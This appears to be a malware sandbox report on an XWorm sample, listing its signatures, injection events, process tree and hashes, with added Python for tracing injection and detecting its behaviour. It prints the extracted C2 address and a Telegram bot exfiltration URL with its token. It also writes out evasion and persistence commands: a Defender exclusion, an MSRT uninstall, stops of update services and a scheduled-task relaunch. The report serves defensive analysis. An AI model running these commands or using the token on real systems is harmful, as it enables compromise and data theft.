Analysis

max time kernel: 149s
max time network: 144s
platform: windows7_x64
resource: win7-20240220-en
resource tags: arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
submitted: 29-03-2024 02:32

Static task: static1
Behavioral task: behavioral1
  Sample: a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
  Resource: win7-20240220-en

General

Target: a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
Size: 455KB
MD5: c8d9593196962fa5d706a207c16674cd
SHA1: 686a8e674e6615d5cd91f7b2cba0c755054b3f69
SHA256: a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d
SHA512: 5ddae80780c6091bfe0ab5e29bc63732c08ce34f677fc341366dcecf6db9e1bd2e0ed24cfe57eface0d19c6f46010f47eb2d74888b91a503dae00651c4a756bf
SSDEEP: 12288:XcTpGLwWpFGIWFfDtaY4S0LEy7w0iymL/:XOpEwiFYxsEyHiyK
Malware Config

Extracted
Family: xworm
Version: 5.1
C2: 104.194.9.116:7000
bUezpCDHVjUVS3W9
install_file: USB.exe
telegram: https://api.telegram.org/bot6330888131:AAE5ycZdHuNqV5SVYhHeCfRENn6GuCjwXjs/sendMessage?chat_id=1046049845
Signatures

Detect Xworm Payload (5 IoCs)
  resource                                                                     yara_rule
  behavioral1/memory/2472-8-0x0000000000400000-0x000000000040E000-memory.dmp   family_xworm
  behavioral1/memory/2472-10-0x0000000000400000-0x000000000040E000-memory.dmp  family_xworm
  behavioral1/memory/2472-13-0x0000000000400000-0x000000000040E000-memory.dmp  family_xworm
  behavioral1/memory/2472-15-0x0000000000400000-0x000000000040E000-memory.dmp  family_xworm
  behavioral1/memory/2472-17-0x0000000000400000-0x000000000040E000-memory.dmp  family_xworm

Detects Windows executables referencing non-Windows User-Agents (5 IoCs)
  the same five dumps of PID 2472 (2472-8, -10, -13, -15, -17 at 0x0000000000400000-0x000000000040E000)  INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA

Detects executables packed with or using KoiVM (1 IoC)
  behavioral1/memory/2184-3-0x0000000000B30000-0x0000000000B94000-memory.dmp  INDICATOR_EXE_Packed_KoiVM

Detects executables using Telegram Chat Bot (5 IoCs)
  the same five dumps of PID 2472  INDICATOR_SUSPICIOUS_EXE_TelegramChatBot

The XWorm, non-Windows User-Agent and Telegram rules hit only memory dumps of PID 2472 (installutil.exe) at 0x0000000000400000-0x000000000040E000, while the KoiVM packer rule hits the dropper itself (PID 2184): the packed sample unpacks the XWorm payload into the .NET Framework utility it spawned rather than running it in its own process (see "Suspicious use of SetThreadContext" and "Suspicious use of WriteProcessMemory" below).

Stops running service(s) (3 TTPs)

Executes dropped EXE (5 IoCs)
  pid   Process
  2480  csocjo.exe
  2548  iltrhn.exe
  1568  vbmfxw.exe
  2692  griwpi.exe
  2384  CasPol.exe

Loads dropped DLL (20 IoCs; identical rows collapsed)
  pid   Process          rows
  2472  installutil.exe  4
  1684  WerFault.exe     5
  3048  WerFault.exe     5
  2172  WerFault.exe     5
  2592  cmd.exe          1

Uses the VBS compiler for execution (1 TTPs)

Drops file in System32 directory (2 IoCs)
  description                   ioc                                                                                                                           Process
  File opened for modification  C:\Windows\system32\MRT.exe                                                                                                   aspnet_wp.exe
  File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe

Suspicious use of SetThreadContext (3 IoCs)
  description                          pid   Process                                                                  procid_target
  PID 2184 set thread context of 2472  2184  a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe  28
  PID 1568 set thread context of 3060  1568  vbmfxw.exe                                                               47
  PID 2692 set thread context of 1948  2692  griwpi.exe                                                               49
  Each target is a Microsoft .NET Framework utility that the source process had just spawned (2472 installutil.exe, 3060 aspnet_wp.exe, 1948 CasPol.exe in the process tree). Together with the WriteProcessMemory rows below, this is the injection step that moves the payload out of the dropped files and into those framework binaries.

Drops file in Windows directory (1 IoCs)
  description   ioc                   Process
  File created  C:\Windows\wusa.lock  wusa.exe

Launches sc.exe (5 IoCs)
  Sc.exe is a Windows utility to control services on the system.
  pid   Process
  940   sc.exe
  1792  sc.exe
  1996  sc.exe
  2128  sc.exe
  2768  sc.exe

Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   Process
  2292  schtasks.exe

Runs ping.exe (1 TTPs, 1 IoCs)
  pid   Process
  620   PING.EXE

Suspicious behavior: EnumeratesProcesses (64 IoCs; repeated rows collapsed)
  pid   Process
  2184  a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe  (repeated)
  2548  iltrhn.exe  (repeated)
  3060  aspnet_wp.exe
  1752  powershell.exe

Suspicious use of AdjustPrivilegeToken (8 IoCs)
  description                 pid   Process
  Token: SeDebugPrivilege     2184  a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
  Token: SeDebugPrivilege     2472  installutil.exe
  Token: SeDebugPrivilege     2548  iltrhn.exe
  Token: SeDebugPrivilege     1752  powershell.exe
  Token: SeShutdownPrivilege  2232  powercfg.exe
  Token: SeShutdownPrivilege  2208  powercfg.exe
  Token: SeShutdownPrivilege  2216  powercfg.exe
  Token: SeShutdownPrivilege  2200  powercfg.exe

Suspicious use of WriteProcessMemory (64 IoCs; identical rows collapsed, the list stops at 64 rows)
  pid   Process                                                                  wrote to memory of  target (from process tree)  procid_target  rows
  2184  a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe  2472                installutil.exe             28             12
  2184  a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe  2600                WerFault.exe                29             3
  2472  installutil.exe                                                          2480                csocjo.exe                  31             4
  2480  csocjo.exe                                                               1712                vbc.exe                     32             9
  2480  csocjo.exe                                                               2348                ngen.exe                    33             9
  2480  csocjo.exe                                                               988                 ilasm.exe                   34             3
  2480  csocjo.exe                                                               448                 wab.exe                     35             9
  2480  csocjo.exe                                                               2220                csc.exe                     36             9
  2480  csocjo.exe                                                               1228                wmplayer.exe                37             6
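The SetThreadContext and WriteProcessMemory tables list the injection events one row at a time, so the link between a write burst, the thread-context change and the YARA hit inside the target is easy to miss. The Python below is an added example, not part of the sandbox output: it parses rows in the report's flattened row format, counts writes per source/target PID pair, joins each SetThreadContext pair to the YARA rules that matched the target's memory dumps, and maps target PIDs to image names transcribed from the process tree. The WriteProcessMemory subset embedded here is the first 28 of the 64 rows; the regexes, the PID-to-image table and the record layout are this example's own.

```python
"""
Added example (not part of the sandbox report): rebuild process-injection
chains from the flattened SetThreadContext / WriteProcessMemory rows and join
them with the YARA memory-dump hits, so each injected target is paired with
the rules that matched inside it.
"""
import re
from collections import Counter, defaultdict

# Rows copied from the report's Signatures section. The WriteProcessMemory
# subset keeps the first 28 of the 64 rows (the list stops at 64).
SET_CONTEXT_ROWS = """
PID 2184 set thread context of 2472 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 28
PID 1568 set thread context of 3060 1568 vbmfxw.exe 47
PID 2692 set thread context of 1948 2692 griwpi.exe 49
"""
WRITE_ROWS = (
    "PID 2184 wrote to memory of 2472 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 28 " * 12
    + "PID 2184 wrote to memory of 2600 2184 a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe 29 " * 3
    + "PID 2472 wrote to memory of 2480 2472 installutil.exe 31 " * 4
    + "PID 2480 wrote to memory of 1712 2480 csocjo.exe 32 " * 9
)
YARA_ROWS = """
behavioral1/memory/2472-8-0x0000000000400000-0x000000000040E000-memory.dmp family_xworm
behavioral1/memory/2472-10-0x0000000000400000-0x000000000040E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TelegramChatBot
behavioral1/memory/2184-3-0x0000000000B30000-0x0000000000B94000-memory.dmp INDICATOR_EXE_Packed_KoiVM
"""
# PID -> image name, transcribed from the report's process tree (this
# example's own lookup table; the sandbox rows carry only the source image).
IMAGES = {
    2184: "a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe",
    2472: "installutil.exe", 2480: "csocjo.exe", 2600: "WerFault.exe",
    1568: "vbmfxw.exe", 3060: "aspnet_wp.exe", 2692: "griwpi.exe",
    1948: "CasPol.exe", 1712: "vbc.exe",
}

# The sandbox prints the source PID twice per row; the backreference \1 makes
# the parser reject rows where the two copies disagree (garbled text).
_CTX = re.compile(r"PID (\d+) set thread context of (\d+) \1 (\S+) \d+")
_WRITE = re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (\S+) \d+")
_YARA = re.compile(r"behavioral1/memory/(\d+)-\d+-(0x[0-9A-Fa-f]+)-(0x[0-9A-Fa-f]+)-memory\.dmp (\S+)")


def parse_writes(text):
    """Count WriteProcessMemory rows per (source pid, target pid)."""
    return Counter((int(s), int(t)) for s, t, _img in _WRITE.findall(text))


def parse_set_context(text):
    """Return {(source pid, target pid): source image} for SetThreadContext rows."""
    return {(int(s), int(t)): img for s, t, img in _CTX.findall(text)}


def parse_yara(text):
    """Return {pid: sorted rule names} for rules that hit a process memory dump."""
    hits = defaultdict(set)
    for pid, _lo, _hi, rule in _YARA.findall(text):
        hits[int(pid)].add(rule)
    return {pid: sorted(rules) for pid, rules in hits.items()}


def injection_chains(ctx_text=SET_CONTEXT_ROWS, write_text=WRITE_ROWS,
                     yara_text=YARA_ROWS, images=IMAGES):
    """One record per SetThreadContext pair: who wrote how often into which
    target, and which YARA rules later matched inside that target.
    A write count of 0 only means the truncated table held no rows for it."""
    writes = parse_writes(write_text)
    yara = parse_yara(yara_text)
    chains = []
    for (src, dst), src_img in sorted(parse_set_context(ctx_text).items()):
        chains.append({
            "source": src, "source_image": src_img,
            "target": dst, "target_image": images.get(dst, "?"),
            "writes": writes.get((src, dst), 0),
            "yara": yara.get(dst, []),
        })
    return chains


if __name__ == "__main__":
    for c in injection_chains():
        print(f"{c['source']} {c['source_image']} -> {c['target']} {c['target_image']}: "
              f"{c['writes']} WriteProcessMemory rows, YARA {c['yara'] or 'none'}")
```

Run stand-alone it prints three chains; only the 2184 -> 2472 chain carries both a write count and the family_xworm hit, which is the single record an analyst needs to name the injected process.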
Processes

[1] C:\Users\Admin\AppData\Local\Temp\a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe  (PID 2184)
    cmd: "C:\Users\Admin\AppData\Local\Temp\a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe"
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe  (PID 2472)
      cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
      - Loads dropped DLL
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] C:\Users\Admin\AppData\Local\Temp\csocjo.exe  (PID 2480)
        cmd: "C:\Users\Admin\AppData\Local\Temp\csocjo.exe"
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe  (PID 1712)
          cmd: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe  (PID 2348)
          cmd: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe  (PID 988)
          cmd: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe"
      [4] C:\Program Files\Windows Mail\wab.exe  (PID 448)
          cmd: "C:\Program Files\Windows Mail\wab.exe"
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  (PID 2220)
          cmd: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
      [4] C:\Program Files\Windows Media Player\wmplayer.exe  (PID 1228)
          cmd: "C:\Program Files\Windows Media Player\wmplayer.exe"
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe  (PID 752)
          cmd: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
      [4] C:\Program Files\Internet Explorer\iexplore.exe  (PID 2996)
          cmd: "C:\Program Files\Internet Explorer\iexplore.exe"
      [4] C:\Windows\explorer.exe  (PID 688)
          cmd: "C:\Windows\explorer.exe"
      [4] C:\Windows\system32\WerFault.exe  (PID 1684)
          cmd: C:\Windows\system32\WerFault.exe -u -p 2480 -s 2160
          - Loads dropped DLL

    [3] C:\Users\Admin\AppData\Local\Temp\iltrhn.exe  (PID 2548)
        cmd: "C:\Users\Admin\AppData\Local\Temp\iltrhn.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Users\Admin\AppData\Local\Temp\vbmfxw.exe  (PID 1568)
        cmd: "C:\Users\Admin\AppData\Local\Temp\vbmfxw.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext

      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe  (PID 3060)
          cmd: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses

        [5] C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe  (PID 1752)
            cmd: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            - Drops file in System32 directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\system32\cmd.exe  (PID 1448)
            cmd: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          [6] C:\Windows\system32\wusa.exe  (PID 2356)
              cmd: wusa /uninstall /kb:890830 /quiet /norestart
              - Drops file in Windows directory
        [5] C:\Windows\system32\sc.exe  (PID 1792)
            cmd: C:\Windows\system32\sc.exe stop UsoSvc
            - Launches sc.exe
        [5] C:\Windows\system32\sc.exe  (PID 1996)
            cmd: C:\Windows\system32\sc.exe stop WaaSMedicSvc
            - Launches sc.exe
        [5] C:\Windows\system32\sc.exe  (PID 2128)
            cmd: C:\Windows\system32\sc.exe stop wuauserv
            - Launches sc.exe
        [5] C:\Windows\system32\sc.exe  (PID 2768)
            cmd: C:\Windows\system32\sc.exe stop bits
            - Launches sc.exe
        [5] C:\Windows\system32\sc.exe  (PID 940)
            cmd: C:\Windows\system32\sc.exe stop dosvc
            - Launches sc.exe
        [5] C:\Windows\system32\powercfg.exe  (PID 2208)
            cmd: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\system32\powercfg.exe  (PID 2232)
            cmd: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\system32\powercfg.exe  (PID 2216)
            cmd: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\system32\powercfg.exe  (PID 2200)
            cmd: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\system32\dialer.exe  (PID 1968)
            cmd: C:\Windows\system32\dialer.exe

      [4] C:\Windows\system32\WerFault.exe  (PID 3048)
          cmd: C:\Windows\system32\WerFault.exe -u -p 1568 -s 2108
          - Loads dropped DLL

    [3] C:\Users\Admin\AppData\Local\Temp\griwpi.exe  (PID 2692)
        cmd: "C:\Users\Admin\AppData\Local\Temp\griwpi.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext

      [4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  (PID 1948)
          cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

        [5] C:\Windows\SysWOW64\cmd.exe  (PID 2592)
            cmd: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "CasPol" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe"
            - Loads dropped DLL
          [6] C:\Windows\SysWOW64\chcp.com  (PID 1208)
              cmd: chcp 65001
          [6] C:\Windows\SysWOW64\PING.EXE  (PID 620)
              cmd: ping 127.0.0.1
              - Runs ping.exe
          [6] C:\Windows\SysWOW64\schtasks.exe  (PID 2292)
              cmd: schtasks /create /tn "CasPol" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe" /rl HIGHEST /f
              - Creates scheduled task(s)
          [6] C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe  (PID 2384)
              cmd: "C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe"
              - Executes dropped EXE

      [4] C:\Windows\system32\WerFault.exe  (PID 2172)
          cmd: C:\Windows\system32\WerFault.exe -u -p 2692 -s 2104
          - Loads dropped DLL

  [2] C:\Windows\system32\WerFault.exe  (PID 2600)
      cmd: C:\Windows\system32\WerFault.exe -u -p 2184 -s 732
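The aspnet_wp.exe (PID 3060) and CasPol.exe (PID 1948) branches of the tree are the part a detection engineer would turn into rules: a .NET Framework utility orchestrating a Defender exclusion, an uninstall of KB890830 (the Malicious Software Removal Tool package), stops of five Windows Update related services, powercfg sleep and hibernate timeouts zeroed, and a scheduled task created with /rl HIGHEST whose action lives under AppData. The Python below is an added example, not sandbox output: it runs those rules over a process-creation event list constructed from the tree above (plus two constructed benign control rows), using a pid/ppid/image/command-line layout, thresholds and rule names that are this example's own rather than any EDR schema.

```python
"""
Added example (not part of the sandbox report): detection rules for the
defense-evasion and persistence cluster visible in the process tree, run over
a constructed process-creation event list (pid, parent pid, image, cmdline).
"""
import re
from collections import defaultdict

# Events transcribed from the report's process tree; the last two rows are
# constructed benign controls that must not fire any rule.
EVENTS = [
    (1948, 2692, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe", r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"'),
    (2592, 1948, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "CasPol" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe"'),
    (2292, 2592, r"C:\Windows\SysWOW64\schtasks.exe", r'schtasks /create /tn "CasPol" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe" /rl HIGHEST /f'),
    (3060, 1568, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe", r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"'),
    (1752, 3060, r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"),
    (1448, 3060, r"C:\Windows\system32\cmd.exe", r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart"),
    (2356, 1448, r"C:\Windows\system32\wusa.exe", r"wusa /uninstall /kb:890830 /quiet /norestart"),
    (1792, 3060, r"C:\Windows\system32\sc.exe", r"C:\Windows\system32\sc.exe stop UsoSvc"),
    (1996, 3060, r"C:\Windows\system32\sc.exe", r"C:\Windows\system32\sc.exe stop WaaSMedicSvc"),
    (2128, 3060, r"C:\Windows\system32\sc.exe", r"C:\Windows\system32\sc.exe stop wuauserv"),
    (2768, 3060, r"C:\Windows\system32\sc.exe", r"C:\Windows\system32\sc.exe stop bits"),
    (940, 3060, r"C:\Windows\system32\sc.exe", r"C:\Windows\system32\sc.exe stop dosvc"),
    (2208, 3060, r"C:\Windows\system32\powercfg.exe", r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0"),
    (2232, 3060, r"C:\Windows\system32\powercfg.exe", r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0"),
    (2216, 3060, r"C:\Windows\system32\powercfg.exe", r"C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0"),
    (2200, 3060, r"C:\Windows\system32\powercfg.exe", r"C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0"),
    (4001, 4000, r"C:\Windows\system32\sc.exe", r"sc.exe stop Spooler"),  # constructed benign control
    (4002, 4000, r"C:\Windows\system32\schtasks.exe", r'schtasks /create /tn "Backup" /sc DAILY /tr "C:\Program Files\Backup\backup.exe" /rl HIGHEST /f'),  # constructed benign control
]

# Services the sample stops (all part of the Windows Update / delivery path).
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
# .NET Framework utilities that were injection targets in this report, plus
# the sibling compilers the tree shows being spawned (assumption: none of
# these should orchestrate administration tooling on a normal host).
DOTNET_UTILITIES = {"aspnet_wp.exe", "caspol.exe", "installutil.exe", "csc.exe", "vbc.exe", "ngen.exe", "ilasm.exe"}
ADMIN_TOOLS = {"sc.exe", "powercfg.exe", "powershell.exe", "cmd.exe", "schtasks.exe", "wusa.exe"}


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return {rule name: sorted pids} for every rule that fired on the event list."""
    hits = defaultdict(set)
    stops = defaultdict(set)     # parent pid -> {(pid, service)} for update-service stops
    powercfg = defaultdict(set)  # parent pid -> {pid} for zeroed sleep/hibernate timeouts
    image_of = {pid: _basename(img) for pid, _ppid, img, _cmd in events}
    for pid, ppid, img, cmd in events:
        name, low = _basename(img), cmd.lower()
        if name == "sc.exe":
            m = re.search(r"\bstop\s+(\S+)", low)
            if m and m.group(1) in UPDATE_SERVICES:
                stops[ppid].add((pid, m.group(1)))
        if name == "powercfg.exe" and re.search(r"-(standby|hibernate)-timeout-(ac|dc)\s+0\b", low):
            powercfg[ppid].add(pid)
        if name == "powershell.exe" and "add-mppreference" in low and "-exclusion" in low:
            hits["defender_exclusion_added"].add(pid)
        if "wusa" in low and "/uninstall" in low and "/kb:890830" in low:
            hits["msrt_uninstalled"].add(pid)  # KB890830 = Malicious Software Removal Tool
        if name == "schtasks.exe" and "/create" in low and "/rl highest" in low:
            tr = re.search(r'/tr\s+"?([^"]+)', low)
            if tr and "\\appdata\\" in tr.group(1):
                hits["highest_rl_task_from_appdata"].add(pid)
        if image_of.get(ppid) in DOTNET_UTILITIES and name in ADMIN_TOOLS:
            hits["dotnet_utility_spawns_admin_tool"].add(pid)
    # Correlation: one stopped service is routine; three or more distinct
    # update-path services from the same parent is the malware pattern.
    for rows in stops.values():
        if len({svc for _pid, svc in rows}) >= 3:
            hits["windows_update_services_stopped"].update(p for p, _svc in rows)
    for pids in powercfg.values():
        if len(pids) >= 2:
            hits["sleep_and_hibernate_disabled"].update(pids)
    return {rule: sorted(pids) for rule, pids in hits.items()}


if __name__ == "__main__":
    for rule, pids in sorted(detect(EVENTS).items()):
        print(f"{rule}: {pids}")
```

The per-parent correlation is what keeps the service-stop and powercfg rules quiet on administrators: each individual command is legitimate, and it is the cluster under one parent process, here a .NET Framework utility, that marks the behaviour.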
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 105KB
MD5: ac93f60717f1fee8c678e624f54852ee
SHA1: d9c9828396d19a7f2920af68a4692409f16beaa9
SHA256: 1fa79bf14d80519f7965a44dcc1f69ec1d24e83eea2927b474c3545e65062f24
SHA512: 9ff7dfe9c8bc2ae775a97227990f332d8b799fbb4235eea7c73756a5359841d355805d1b624b40fe8f7e864c997a604d3c10ad1fa1182deb5842ab77aad9b1b7

Filesize: 756KB
MD5: d76027fe4cfd48c7f8999c796e50e731
SHA1: 5026422e84bf445e2d141529e2b808187a30d9f6
SHA256: 148da274864c690a7c01119e025bdc0ab94fa9c110c30afb42e51b1c990a2799
SHA512: 2e2c4a5319a61555913648702ddcfb8b40d548dcfda1a536a2e85f9cb85d25d9a463743dc866f86b4de99fd10f9c402def424b9e8a203189518f45e924b89d2d

Filesize: 393KB
MD5: 3f3a51617811e9581aba50376599efa6
SHA1: 9b26aa73f43a4db9b216b90d1aa3e2e4d602fde8
SHA256: 5f3403e13e316d9320d46233e9f62b183623c46ec80c6c55139efdd72c5ada37
SHA512: 9ad5cfb29281dd462b726c7ee239926f83050181fe4f6c3e9057e51df65ae7f850cecbf1cb453287720314275335df36bb8d5299d09a1f73329a5b9292db3ee3

Filesize: 16.5MB
MD5: d01b812c108576056594805b6e9e7064
SHA1: 290fc3e50cf13a1595f1ba3357285153ac98834d
SHA256: 9a6ac9acc3267fc22ecd8872e3e9d863dce608d609ee06fb0769b599ce669ec4
SHA512: d3709b4a6760e149bcd774f7648857a47161e7144530e3d1ae700b33861837d494d646bb8accd3980b3ccb955682c9c1ebe2c3f22371fb9566f669c48fb09be4

Filesize: 3.1MB
MD5: 86e00d529b3b454a84b942ac916211e3
SHA1: 021c733e5448436b384bf0d3a0ba81f4d0d93f9a
SHA256: 30e01b261cb5d7524a303cdbe9d177fc05d74279642e4a87b46ee70045e68d53
SHA512: 9a08379b35a3bf1699b925c6dbfc6e85123f1155e567929eaff3683e5e9f196a16775e3a2f6a7585f7c0f0f201ef4be009cda5cf94b160742642145837c3de1e